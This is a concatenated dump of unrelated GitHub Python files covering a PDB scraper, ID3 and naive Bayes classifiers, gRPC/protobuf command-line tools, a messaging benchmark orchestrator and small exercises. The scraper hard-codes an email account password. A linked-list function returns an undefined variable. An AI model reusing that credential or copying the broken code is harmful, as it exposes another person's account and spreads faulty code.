len_pick):\r\n \r\n df = pd.DataFrame(para_arr,columns=[\"ID_order\",\"ID\",\"Header\",\r\n \"Date\",\"a\",\"b\",\"c\",\"alpha\",\"beta\",\"gamma\",\r\n \"Space_Group\",\"Reso_High\",\"Reso_Low\",\"Sol_Cont\",\r\n \"Chain\",\"Num_Protein_Atom\",\"B_val_wilson\",\"B_val_overall\"])\r\n df.to_excel(writer, index=False,encoding='utf-8',sheet_name=\"foundID\") \r\n writer.save()\r\n time.sleep(1)\r\npool.close()\r\npool.join()\r\n#----------------------------------------------------------------------------\r\n#send remind email to when finished.\r\nreceiver = \"ycheng22@hotmail.com\"\r\nbody = \"job finished!_\"+ str(index_beg) + \"_to_\" + str(index_end-1) \r\n\r\nyag = yagmail.SMTP(user=\"ycheng2020@gmail.com\", password=\"15138065260cyp\", host='smtp.gmail.com')\r\nyag.send(\r\n to=receiver,\r\n subject=body,\r\n contents=body, \r\n)\r\n#----------------------------------------------------------------------------\r\ntoc = time.time()\r\nprint(\"\\n Time elapsed:\", toc - tic, \"seconds\") \r\n","repo_name":"ycheng22/Scrape_PDB_data_with_Python","sub_path":"scrap_pdb_improv_thread.py","file_name":"scrap_pdb_improv_thread.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6753166280","text":"# 🚨 Don't change the code below 👇\nfrom turtle import pos\n\nrow1 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow2 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow3 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure? \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this row 👇\n# convert_position = position.split(\",\")\n# toString = str(convert_position[0]) + (convert_position[1])\n# print(toString)\n\n# if toString == \"11\":\n# row1[0] = \" x\"\n# elif toString == \"12\":\n# row2[0] = \" x\"\n# elif toString == \"13\":\n# row3[0] = \" x\"\n# elif toString == \"21\":\n# row1[1] = \" x\"\n# elif toString == \"22\":\n# row2[1] = \" x\"\n# elif toString == \"23\":\n# row3[1] = \" x\"\n# elif toString == \"31\":\n# row1[2] = \" x\"\n# elif toString == \"32\":\n# row2[2] = \" x\"\n# elif toString == \"33\":\n# row3[2] = \" x\"\n# else:\n# print(\"\\nTry Again\\n\")\n\nhorizontal = int(position[0])\nvertical = int(position[1])\n\nselected_row = map[vertical -1]\nselected_row[horizontal -1] = \" X\"\n\nprint(f\"\\n{row1}\\n{row2}\\n{row3}\\n\")\n\n\n\n","repo_name":"johns-santos/python","sub_path":"basic_concepts/day_01-04/treasure_map.py","file_name":"treasure_map.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15311183526","text":"\"\"\"\r\nThe goal of this program is to implement ID3 algorithm for decision trees\r\nThe last column of the data set is treated as the class label \r\nThis program was written to find the decision tree structure of the car data set and write it into an xml format.\r\n\r\nFor data set descriptions : http://archive.ics.uci.edu/ml/datasets/Car+Evaluation\r\n\r\nFormat to execute the program:\r\n\r\npython calida_decisiontree.py --data \"D:\\car.csv\" --output \"D:\\car_output.xml\"\r\npython calida_decisiontree.py --data \"D:\\nursery.csv\" --output \"D:\\nursery_output.xml\"\r\n\r\n\"\"\"\r\n\r\nimport argparse \r\nimport pandas as pd\r\nimport numpy as np\r\nimport lxml\r\nfrom lxml import etree as etree\r\nimport math\r\nimport time\r\n\r\n#Function to take commandline inputs\r\ndef userInput():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--data\" , help=\"Data file location\")\r\n parser.add_argument(\"--output\", help=\"Optput file location\")\r\n\r\n args=parser.parse_args()\r\n \r\n inputFile = args.data\r\n outputFile = args.output\r\n\r\n return inputFile, outputFile\r\n\t\r\n#Function to find the entropy \r\ndef findEntropy(df):\r\n lastColumn = df.keys()[-1]\r\n uniqueValues = df[int(lastColumn)].value_counts().keys().tolist()\r\n countOfUniqueValues = df[int(lastColumn)].value_counts().tolist()\r\n total = len(df[lastColumn])\r\n sumOfEntropies = 0\r\n for i in range (len(countOfUniqueValues)):\r\n prob = countOfUniqueValues[i]/total\r\n entropy = -prob*math.log(prob,c)\r\n sumOfEntropies = sumOfEntropies + entropy\r\n return sumOfEntropies\r\n\t\r\n#Function to find the weighted sum of entropies for an attribute \r\ndef findSumOfWeightedEntropies(df,attribute):\r\n#Finding Proportions\r\n lastColumn = df.keys()[-1]\r\n uniqueValuesOfAttr = df[attribute].value_counts().keys().tolist()\r\n countOfUniqueValues = df[attribute].value_counts().tolist()\r\n total = len(df[attribute])\r\n #print(total)\r\n proportion = [i / total for i in countOfUniqueValues]\r\n\r\n #Finding unique values of target \r\n uniqueValuesOfTarget = df[lastColumn].value_counts().keys().tolist()\r\n\r\n #Finding count of each unique value in the attribute for each unique target label \r\n index = uniqueValuesOfAttr\r\n columns = df[lastColumn].value_counts().keys().tolist()\r\n df_count = pd.DataFrame(index=index, columns=columns)\r\n df_count = df_count.fillna(0) \r\n #df_count\r\n\r\n for i in range(len(df[attribute])):\r\n #aV = df[attribute].loc[i]\r\n #tV = df[lastColumn].iloc[i]\r\n aV = df[attribute].values[i]\r\n tV = df[lastColumn].values[i]\r\n \r\n \r\n df_count.loc[aV,tV] = int(df_count.loc[aV,tV])+1\r\n\r\n #print(df_count)\r\n\r\n #Finding sum of each unique value and appending it to the df_count dataframe\r\n df_count.loc[:,'sum'] = df_count.sum(numeric_only=True, axis=1)\r\n #print(df_count)\r\n\r\n #Calculating entropy of unique values in the attribute \r\n df_entcal = pd.DataFrame(index=index, columns=columns)\r\n df_entcal = df_entcal.fillna(0) \r\n #df_entcal\r\n\r\n for p in uniqueValuesOfAttr:\r\n for q in columns:\r\n prob = df_count.loc[p,q]/df_count.loc[p,'sum']\r\n if prob==0:\r\n df_entcal.loc[p,q] = 0 \r\n else:\r\n df_entcal.loc[p,q] = -prob*math.log(prob,c)\r\n\r\n #print(df_entcal)\r\n df_entcal.loc[:,'sum'] = df_entcal.sum(numeric_only=True, axis=1)\r\n #print(df_entcal)\r\n\r\n weights =[]\r\n for k in uniqueValuesOfAttr:\r\n weights.append(df_count.loc[k,'sum']/total)\r\n\r\n sumOfWeightedEntropies = 0 \r\n for k in range (len(weights)):\r\n sumOfWeightedEntropies = sumOfWeightedEntropies - weights[k]*df_entcal.iloc[k,-1]\r\n #print(sumOfWeightedEntropies)\r\n return sumOfWeightedEntropies\r\n\r\n#Function to find information gain for an attribute \r\ndef findInfoGain(df,attribute,treeEnt):\r\n weightedEntropies = findSumOfWeightedEntropies(df,attribute)\r\n infoGain = treeEnt + weightedEntropies\r\n return infoGain\r\n\t\r\n#Function to get the best attribute \r\ndef getBestAttribute(df,treeEnt):\r\n ig = []\r\n lastColumn = df.keys()[-1]\r\n for i in range (lastColumn):\r\n ig.append(findInfoGain(df,i,treeEnt))\r\n a = np.argmax(ig)\r\n #print(ig)\r\n return(a)\r\n\r\n#Recursive function for ID3 to find the next best attribute/ label\r\ndef id3(df,targetAttribute,bestAttribute,remainAttr,currentNode):\r\n #print(\"BestAttribute:\",bestAttribute)\r\n \r\n #count no. of unique labels in the target attribute\r\n from collections import Counter\r\n cnt = Counter(x for x in df[targetAttribute])\r\n \r\n #If there's only one label in the targetAttribute, means it is pure\r\n if len(cnt)==1:\r\n entu = findEntropy(df)\r\n #print(\"Test\",entu)\r\n \r\n else:\r\n # Get unique values of the best Attribute that will be the edges\r\n vals = df[bestAttribute].value_counts().keys().tolist()\r\n \r\n #Create sub data frames\r\n for i in vals:\r\n #print(i)\r\n df_sub = df.loc[df[bestAttribute]==i]\r\n \r\n subEntropy = findEntropy(df_sub)\r\n #print(subEntropy)\r\n\r\n \r\n if(subEntropy == 0):\r\n node = etree.SubElement(currentNode, \"node\",entropy=\"0.0\",feature=\"att{val}\".format(val=bestAttribute),value=i)\r\n node.text=df_sub.iloc[0,-1]\r\n else:\r\n bestA = getBestAttribute(df_sub,subEntropy)\r\n remainingAttributes = [i for i in remainAttr if i != bestA]\r\n #print(\"Next best attribute:\",bestA)\r\n node = etree.SubElement(currentNode, \"node\",entropy=str(subEntropy),feature=\"att{val}\".format(val=bestAttribute),value=i)\r\n id3(df_sub,cols-1,bestA,remainingAttributes,node)\r\n \r\n \r\nif __name__ ==\"__main__\":\r\n\r\n #start = time.perf_counter()\r\n \r\n #Commandline input from user\r\n inputFile, outputFile = userInput()\r\n\r\n df_car = pd.read_csv(inputFile,header=None)\r\n\r\n #Finding no. of class labels - this value is also used to compute entropy \r\n rows,cols = df_car.shape\r\n c = len(df_car[cols-1].value_counts().keys()) \r\n\r\n # Find Tree entropy \r\n treeEntropy = findEntropy(df_car)\r\n\r\n #Adding tree entropy to xml - \r\n root = etree.Element(\"tree\", entropy=str(treeEntropy)) \r\n\r\n #Finding the best attribute to start the decision tree\r\n bestAttr = getBestAttribute(df_car,treeEntropy)\r\n\r\n #Find remaining attributes - attributes that \r\n attributeNames = df_car.keys().tolist()\r\n attributeNames.remove(cols-1) #Removing the target column\r\n remainingAttributes = [i for i in attributeNames if i != bestAttr] #Removing the attribute chosen as the root node\r\n \r\n id3(df_car,cols-1,bestAttr,remainingAttributes,root)\r\n\r\n with open(outputFile, 'wb') as doc:\r\n doc.write(etree.tostring(root, pretty_print = True))\r\n \r\n #end = time.perf_counter()\r\n #print (\"Time taken : %.2gs\" % (end-start))\r\n\r\n","repo_name":"CalidaPereira/machine-learning-codes","sub_path":"Decision Tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74098543931","text":"import pandas as pd\nimport numpy as np\n \n# calculate each class probability \ndef compute_class_priors(df, groupAttr):\n result = {}\n \n groups = df.groupby(groupAttr)\n for group in groups:\n result[group[0]] = len(group[1]) / len(df)\n \n return result\n\n# calculate probabilities for given value in each class for each attribute\ndef compute_for_all_classes(data, groupAttr, attrs, new_example):\n result = {}\n groups = data.groupby(groupAttr)\n \n for group in groups:\n result[group[0]] = compute_for_all_attrs(group[1], attrs, new_example)\n \n return result\n\ndef compute_for_all_attrs(group, attrs, new_example):#attrs i new_example muszą miec taka sama kolejnosc atrybutow\n result = 1\n \n for attr in attrs:\n result *= compute_for_attr(group, attr, new_example[attr])\n\n return result\n \ndef compute_for_attr(group, attr, new_attr_value): \n attr_groups = group.groupby(attr)\n \n for attr_value in attr_groups:\n if attr_value[0] == new_attr_value:\n return (len(attr_value[1]) / len(group))\n \n return 0\n","repo_name":"pjakimow/ProbabilisticML","sub_path":"naive-bayes-classifier/probabilities.py","file_name":"probabilities.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21563499413","text":"while 1:\n def fib(n):\n if n==0 or n==1:\n return n\n else:\n return fib(n-1)+fib(n-2)\n num=input(\"Enter a positve number(number of terms)(enter nothing to quit):\")\n if num==\"\":\n print(\"Have a good day!\")\n break\n elif not num.isnumeric() or int(num)<0:\n print(\"enter a positive integer\")\n else:\n print(\"Fibonacci series:\")\n [print(fib(i)) for i in range(int(num))]\n","repo_name":"sandesh-prabhu/fibonacci-series-in-python","sub_path":"fibonacci_series.py","file_name":"fibonacci_series.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70543597373","text":"import argparse\nimport inspect\nimport logging\nimport multiprocessing as mproc\nimport os\nimport sys\nfrom functools import partial\n\nfrom imsegm.utilities.data_io import update_path\nfrom imsegm.utilities.experiments import save_config_yaml\n\nsys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root\nfrom bpdl.data_utils import (\n add_image_binary_noise,\n add_image_fuzzy_pepper_noise,\n CSV_NAME_WEIGHTS,\n dataset_apply_image_function,\n dataset_binary_combine_patterns,\n dictionary_generate_atlas,\n DIR_MANE_SYNTH_DATASET,\n image_deform_elastic,\n image_transform_binary2fuzzy,\n)\n\nNB_WORKERS = int(mproc.cpu_count() * 0.7)\nDEFAULT_PATH_DATA = update_path('data_images')\nDEFAULT_PATH_APD = os.path.join(DEFAULT_PATH_DATA, DIR_MANE_SYNTH_DATASET)\nNAME_WEIGHTS = CSV_NAME_WEIGHTS\nNAME_CONFIG = 'config.yml'\nIMAGE_SIZE = {\n '2D': (64, 64),\n '3D': (16, 128, 128),\n}\nDATASET_TYPE = '2D'\nNB_SAMPLES = 50\nNB_ATM_PATTERNS = 4\nNOISE_BINARY = 0.03\nNOISE_FUZZY = 0.15\n\n\ndef aparse_params():\n \"\"\"\n SEE: https://docs.python.org/3/library/argparse.html\n :return obj:\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-p', '--path_out', type=str, required=False, default=DEFAULT_PATH_APD, help='path to the output dataset'\n )\n parser.add_argument(\n '--nb_samples', type=int, required=False, default=NB_SAMPLES, help='number of samples to be generated'\n )\n parser.add_argument(\n '--nb_patterns',\n type=int,\n required=False,\n default=NB_ATM_PATTERNS,\n help='number of atom. patterns in created dictionary'\n )\n parser.add_argument(\n '--image_size',\n type=int,\n required=False,\n nargs='+',\n default=IMAGE_SIZE[DATASET_TYPE],\n help='dimensions of generated images in axis Z, X, Y'\n )\n parser.add_argument(\n '--nb_workers', type=int, required=False, default=NB_WORKERS, help='number of processes in parallel'\n )\n args = parser.parse_args()\n assert len(args.image_size) == 2 or len(args.image_size) == 3, 'unsupported image dimension of %r' % args.image_size\n args.path_out = os.path.abspath(os.path.expanduser(args.path_out))\n return args\n\n\ndef view_func_params(frame=inspect.currentframe(), path_out=''):\n \"\"\" view function parameters\n\n :param frame:\n :param str path_out:\n :return dict:\n\n >>> view_func_params() # doctest: +ELLIPSIS\n {...}\n \"\"\"\n _, _, _, values = inspect.getargvalues(frame)\n logging.info('PARAMETERS: \\n%s', '\\n'.join('\"{}\": \\t {}'.format(k, values[k]) for k in values))\n if os.path.exists(path_out):\n save_config_yaml(os.path.join(path_out, NAME_CONFIG), values)\n return values\n\n\ndef generate_all(\n path_out=DEFAULT_PATH_APD,\n atlas_size=IMAGE_SIZE[DATASET_TYPE],\n nb_patterns=NB_ATM_PATTERNS,\n nb_samples=NB_SAMPLES,\n nb_workers=NB_WORKERS\n):\n \"\"\" generate complete dataset containing dictionary od patterns and also\n input binary / fuzzy images with geometrical deformation and random noise\n\n :param tuple(int,int) atlas_size:\n :param int nb_samples:\n :param int nb_patterns:\n :param str csv_name:\n :param str path_out: path to the results directory\n \"\"\"\n assert nb_patterns > 0, 'number of patterns has to be larger then 0'\n assert os.path.exists(os.path.dirname(path_out)), 'missing: %s' % os.path.dirname(path_out)\n if not os.path.exists(path_out):\n os.mkdir(path_out)\n view_func_params(inspect.currentframe(), path_out)\n _path_dir = lambda d: os.path.join(path_out, d)\n # im_dict = dictionary_generate_rnd_pattern()\n im_dict = dictionary_generate_atlas(path_out, im_size=atlas_size, nb_patterns=nb_patterns)\n assert len(im_dict) > 0, 'dictionary has contain at least one pattern'\n\n im_comb, df_weights = dataset_binary_combine_patterns(im_dict, _path_dir('datasetBinary_raw'), nb_samples)\n df_weights.to_csv(os.path.join(path_out, NAME_WEIGHTS))\n\n _warp_ds_apply = partial(dataset_apply_image_function, nb_workers=nb_workers)\n\n im_deform = _warp_ds_apply(im_comb, _path_dir('datasetBinary_deform'), image_deform_elastic)\n _warp_ds_apply(im_comb, _path_dir('datasetBinary_noise'), add_image_binary_noise, NOISE_BINARY)\n _warp_ds_apply(im_deform, _path_dir('datasetBinary_defNoise'), add_image_binary_noise, NOISE_BINARY)\n\n im_comb_prob = _warp_ds_apply(im_comb, _path_dir('datasetFuzzy_raw'), image_transform_binary2fuzzy, 0.5)\n im_def_prob = _warp_ds_apply(im_deform, _path_dir('datasetFuzzy_deform'), add_image_fuzzy_pepper_noise, 0.5)\n _warp_ds_apply(im_comb_prob, _path_dir('datasetFuzzy_noise'), add_image_fuzzy_pepper_noise, NOISE_FUZZY)\n _warp_ds_apply(im_def_prob, _path_dir('datasetFuzzy_defNoise'), add_image_fuzzy_pepper_noise, NOISE_FUZZY)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n logging.info('running...')\n\n params = aparse_params()\n generate_all(\n path_out=params.path_out,\n atlas_size=params.image_size,\n nb_patterns=params.nb_patterns,\n nb_samples=params.nb_samples,\n nb_workers=params.nb_workers\n )\n\n # test_Ellipse()\n\n logging.info('DONE')\n","repo_name":"Borda/pyBPDL","sub_path":"experiments/run_dataset_generate.py","file_name":"run_dataset_generate.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"28030127537","text":"# Use `urllib` to retrieve a document from a user-input URL, display up to 3000 characters, \n# and count the number of characters in the document (ignore header).\n\nimport urllib.request\n\nwhile True :\n url = input('Enter URL of file: ')\n try :\n fhandle = urllib.request.urlopen(url)\n except FileNotFoundError :\n yn = input('File not found. Would you like to try again? (y/n): ')\n if yn == 'y' :\n continue\n else :\n quit()\n break\n\nchar_count = 0\nspc_count = 0\nfor line in fhandle :\n line = line.decode().strip()\n # the line below shortens this: char_count = char_count + len(line)\n char_count += len(line)\n spc_count += line.count(' ')\n if char_count > 3000 : break\n print(line)\n\nprint(f'\\nNumber of characters in this document (maximum 3000): {char_count} (of which {spc_count} are spaces)')","repo_name":"macanneul/Python_for_Everybody","sub_path":"12.03_urllib_and_count.py","file_name":"12.03_urllib_and_count.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3356465626","text":"\ndef ensure_binary(stream):\n try:\n return stream.buffer # Python 3\n except AttributeError:\n return stream # Python 2\n\ndef pw():\n from .protobuf import ENCODERS, encode_message\n import argparse, sys\n\n # hack parameters to allow defaulting first argument to 1\n field_number_present = True\n field_number = 1\n try:\n len(sys.argv) < 2 or sys.argv[1][0] == '-' or int(sys.argv[1])\n except ValueError:\n field_number_present = False\n\n parser = argparse.ArgumentParser(description='Write protobuf messages from low-level input')\n if field_number_present:\n parser.add_argument('field_number', type=int, default=field_number)\n parser.add_argument('data_type', choices=ENCODERS.keys(), default='bytes')\n parser.add_argument('values', nargs='*')\n\n args = parser.parse_args()\n\n if len(args.values) == 0:\n value = ensure_binary(sys.stdin).read()\n elif len(args.values) == 1:\n value = args.values[0]\n else:\n value = args.values\n\n if field_number_present:\n field_number = args.field_number\n\n msg = encode_message(field_number, args.data_type, value)\n ensure_binary(sys.stdout).write(msg)\n\n\ndef grpc_frame():\n from .grpc_frame import wrap_grpc_stream, encode_grpc_frame, \\\n unwrap_grpc_stream, pipe_unwrap_grpc_frame\n\n import argparse, sys\n\n parser = argparse.ArgumentParser(description='Wrap / unwrap protobufs to GRPC frames')\n parser.add_argument('command', choices=['wrap', 'unwrap'])\n parser.add_argument('--stream', action='store_true')\n parser.add_argument('--tag', type=int, default=1)\n #parser.add_argument('--wire_type', type=int, default=LENGTH_DELIM)\n\n args = parser.parse_args()\n\n in_stream = ensure_binary(sys.stdin)\n out_stream = ensure_binary(sys.stdout)\n\n if args.command == 'wrap':\n if args.stream:\n wrap_grpc_stream(in_stream, out_stream)\n else:\n out_stream.write(encode_grpc_frame(in_stream.read()))\n elif args.command == 'unwrap':\n if args.stream:\n unwrap_grpc_stream(in_stream, out_stream, args.tag)\n else:\n pipe_unwrap_grpc_frame(in_stream, out_stream)\n\n\ndef grpc_client():\n from .grpc_frame import encode_message, protobuf_stream_gen\n # pylint: disable=E0401\n import grpc\n\n def parse_args():\n import argparse\n\n parser = argparse.ArgumentParser(description='Simple binary GRPC client')\n parser.add_argument('-is', '--stream_request', action='store_true')\n parser.add_argument('-os', '--stream_response', action='store_true')\n parser.add_argument('--tag', type=int, default=1)\n parser.add_argument('url')\n\n return parser.parse_args()\n\n def mode_name(is_stream):\n if is_stream:\n return 'stream'\n return 'unary'\n\n def client(in_stream, out_stream, args):\n host, _, path = args.url.partition('/')\n\n channel = grpc.insecure_channel(host)\n\n # e.g. unary_stream\n mode = mode_name(args.stream_request) + '_' + mode_name(args.stream_response)\n\n passthrough = lambda x: x\n\n service = getattr(channel, mode)('/' + path,\n request_serializer=passthrough,\n response_deserializer=passthrough)\n\n if args.stream_request:\n req = protobuf_stream_gen(in_stream)\n else:\n req = in_stream.read()\n\n if args.stream_response:\n for item in service(req):\n out_stream.write(encode_message(args.tag, \"bytes\", item))\n else:\n out_stream.write(service(req))\n\n import sys\n args = parse_args()\n in_stream = ensure_binary(sys.stdin)\n out_stream = ensure_binary(sys.stdout)\n client(in_stream, out_stream, args)\n\ndef pw_decode():\n import json, sys\n from .proto_decoding import parse_stream_with_spec, parse_spec\n\n def parse_args():\n import argparse\n parser = argparse.ArgumentParser(description='Parse protobuf messages with minimal spec')\n parser.add_argument('spec', help=\"For example: 2:string,3:{2:float,4:[1:sfixed32]}\")\n parser.add_argument('--pretty', action='store_true')\n return parser.parse_args()\n\n args = parse_args()\n parsed = parse_stream_with_spec(ensure_binary(sys.stdin), parse_spec(args.spec))\n opts = { 'sort_keys': True }\n if args.pretty: opts['indent'] = 2\n print(json.dumps(parsed, **opts))\n","repo_name":"oseiskar/protowire","sub_path":"protowire/commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"3698544979","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \"\"\"\n 1. Save the next element to tmp.\n 2. Set the previous elemennt to head.next. In the first loop, the previous element is NULL.\n 3. Set the current element to prev. In the secou¥nd loop, the current element will be the previous element.\n 4. Get the next element from tmp.\n \"\"\"\n tmp = None # next element\n prev = None # previous element\n while head != None:\n tmp = head.next\n head.next = prev\n prev = head\n head = tmp\n # ans = prev.next\n return ans\n\n\n# Entry point for debug\nif __name__ == \"__main__\":\n li = [1,2,3,4,5]\n root = ListNode()\n head = root\n for l in li:\n head.val = l\n head.next = ListNode()\n head = head.next\n s = Solution()\n s.reverseList(head=root)","repo_name":"HagaSpa/coding-problems","sub_path":"leetcode/reverse-linked-list/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24674282533","text":"from abc import ABCMeta, abstractmethod\nfrom os import path\n\n\nclass BusConf(object):\n \"\"\"Common class to modelize bus configuration.\"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, conf):\n self.conf = conf\n self.transport = self.get_transport()\n\n @abstractmethod\n def get_listener(self, conf):\n pass\n\n @abstractmethod\n def get_transport(self):\n pass\n\n def to_dict(self):\n return self.conf\n\n\nclass RabbitMQConf(BusConf):\n\n def __init__(self, conf):\n super(RabbitMQConf, self).__init__(conf)\n\n def get_listener(self, **kwargs):\n \"\"\"Returns the listener for rabbitmq.\n :param kwargs:\n \"\"\"\n return {\n \"machine\": self.conf[\"machine\"],\n \"port\": self.conf[\"port\"]\n }\n\n def get_transport(self):\n return \"rabbit\"\n\n\nclass QdrConf(BusConf):\n\n def __init__(self, conf):\n super(QdrConf, self).__init__(conf)\n self.transport = \"amqp\"\n\n def get_listener(self, **kwargs):\n \"\"\"Returns the listener for qdr.\n\n This is where external client can connect to.\n The contract is that this kind of listener has the role \"normal\"\n and there is exactly one such listener per router\n :param kwargs:\n \"\"\"\n listeners = self.conf[\"listeners\"]\n listener = [l for l in listeners if l[\"role\"] == \"normal\"]\n return {\n \"machine\": listener[0][\"host\"],\n \"port\": listener[0][\"port\"]\n }\n\n def get_transport(self):\n return \"amqp\"\n\n\nclass OmbtAgent(object):\n \"\"\"Modelize an ombt agent.\"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, **kwargs):\n # NOTE(msimonin): maybe use __getattr__ at some point\n self.agent_id = kwargs[\"agent_id\"]\n self.machine = kwargs[\"machine\"]\n self.control_agents = kwargs[\"control_agents\"]\n self.bus_agents = kwargs[\"bus_agents\"]\n self.timeout = kwargs[\"timeout\"]\n # generated\n self.agent_type = self.get_type()\n # docker\n self.detach = True\n self.topic = kwargs[\"topic\"]\n # calculated attr\n self.name = self.agent_id\n # where to log inside the container\n self.docker_log = \"/home/ombt/ombt-data/agent.log\"\n # where to log outside the container (mount)\n self.log = path.join(\"/tmp/ombt-data\", \"%s.log\" % self.agent_id)\n # the command to run\n self.command = self.get_command()\n\n def to_dict(self):\n d = self.__dict__\n d.update({\n \"control_agents\": [a.to_dict() for a in self.control_agents],\n \"bus_agents\": [a.to_dict() for a in self.bus_agents],\n })\n return d\n\n @abstractmethod\n def get_type(self):\n pass\n\n def generate_connections(self):\n connections = {}\n for agents, agent_type in zip([self.control_agents, self.bus_agents], [\"control\", \"url\"]):\n connection = []\n for agent in agents:\n listener = agent.get_listener()\n transport = agent.transport\n connection.append(\"{{ hostvars['%s']['ansible_' + control_network]['ipv4']['address'] }}:%s\" %\n (listener[\"machine\"], listener[\"port\"]))\n connections[agent_type] = \"%s://%s\" % (transport, \",\".join(connection))\n return \"--control %s --url %s\" % (connections[\"control\"], connections[\"url\"])\n\n def get_command(self):\n \"\"\"Build the command for the ombt agent.\n \"\"\"\n command = []\n command.append(\"--debug\")\n command.append(\"--unique\")\n command.append(\"--timeout %s \" % self.timeout)\n command.append(\"--topic %s \" % self.topic)\n command.append(self.generate_connections())\n command.append(self.get_type())\n # NOTE(msimonin): we don't use verbosity for client/server\n # if self.verbose:\n # command.append(\"--output %s \" % self.docker_log)\n return command\n\n\nclass OmbtClient(OmbtAgent):\n\n def get_type(self):\n return \"rpc-client\"\n\n\nclass OmbtServer(OmbtAgent):\n\n def __init__(self, **kwargs):\n self.executor = kwargs[\"executor\"]\n super(OmbtServer, self).__init__(**kwargs)\n\n def get_command(self):\n \"\"\"Build the command for the ombt server.\n \"\"\"\n command = super(OmbtServer, self).get_command()\n command.append(\"--executor %s\" % self.executor)\n return command\n\n def get_type(self):\n return \"rpc-server\"\n\n\nclass OmbtController(OmbtAgent):\n\n def __init__(self, **kwargs):\n self.timeout = kwargs[\"timeout\"]\n self.call_type = kwargs[\"call_type\"]\n self.nbr_calls = kwargs[\"nbr_calls\"]\n self.pause = kwargs[\"pause\"]\n self.length = kwargs[\"length\"]\n super(OmbtController, self).__init__(**kwargs)\n\n def get_type(self):\n return \"controller\"\n\n def get_command(self):\n \"\"\"Build the command for the ombt controller.\n \"\"\"\n command = super(OmbtController, self).get_command()\n # We always dump stat per agents\n command.append(\"--output %s\" % self.docker_log)\n command.append(self.call_type)\n command.append(\"--calls %s\" % self.nbr_calls)\n command.append(\"--pause %s\" % self.pause)\n command.append(\"--length %s\" % self.length)\n return \" \".join(command)\n","repo_name":"msimonin/ombt-orchestrator","sub_path":"orchestrator/ombt.py","file_name":"ombt.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"1314088572","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nReadlist utilities\n\"\"\"\n\nimport os.path as op\nimport sys\nimport re\nimport logging\nimport pandas as pd\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom matplotlib_venn import venn3, venn3_circles\n\ndef venn3_coord(args):\n fhi = open(args.fi, 'r')\n s1 = fhi.readline().strip().split(\",\")\n s2 = fhi.readline().strip().split(\",\")\n s3 = fhi.readline().strip().split(\",\")\n fhi.close()\n s1, s2, s3 = set(s1), set(s2), set(s3)\n v = venn3([s1, s2, s3], ('A','B','C'))\n fho1 = open(args.fo1, 'w')\n for xy, l in zip(v.centers, v.radii):\n x, y = xy\n fho1.write(\"%s\\t%s\\t%s\\n\" % (x, y, l))\n fho1.close()\n fho2 = open(args.fo2, 'w')\n for xyl in v.subset_labels:\n x, y = xyl.get_position()\n l = xyl.get_text()\n fho2.write(\"%s\\t%s\\t%s\\n\" % (x, y, l))\n fho2.close()\n\ndef add_stat(args):\n cvt = {k: int for k in 'Replicate'.split()}\n sl = pd.read_csv(args.fi, sep=\"\\t\", header=0, converters=cvt)\n firstN = 10000\n\n sl['spots'] = [0] * len(sl.index)\n sl['avgLength'] = [0] * len(sl.index)\n for i in range(len(sl)):\n sid = sl['SampleID'][i]\n fq = ''\n if sl['paired'][i]:\n r1, r2 = sl['r1'][i], sl['r2'][i]\n fq = r1\n else:\n fq = sl['r0'][i]\n\n nrcd = 0\n L = []\n for rec in iter_fastq(fq):\n if not rec:\n break\n nrcd += 1\n if nrcd <= firstN:\n L.append(len(rec))\n\n avgLength = SummaryStats(L).mean\n if sl['paired'][i]:\n avgLength = avgLength * 2\n\n print(\"\\t\".join(str(x) for x in (sid, nrcd, avgLength)))\n sl.at[i, 'spots'] = nrcd\n sl.at[i, 'avgLength'] = avgLength\n\n sl.to_csv(args.fo, sep=\"\\t\", header=True, index=False)\n\ndef main():\n import argparse\n ps = argparse.ArgumentParser(\n formatter_class = argparse.ArgumentDefaultsHelpFormatter,\n description = '3-way venn-diagram'\n )\n sp = ps.add_subparsers(title = 'available commands', dest = 'command')\n\n sp1 = sp.add_parser('coord', help='compute venn3 coordinates',\n formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n 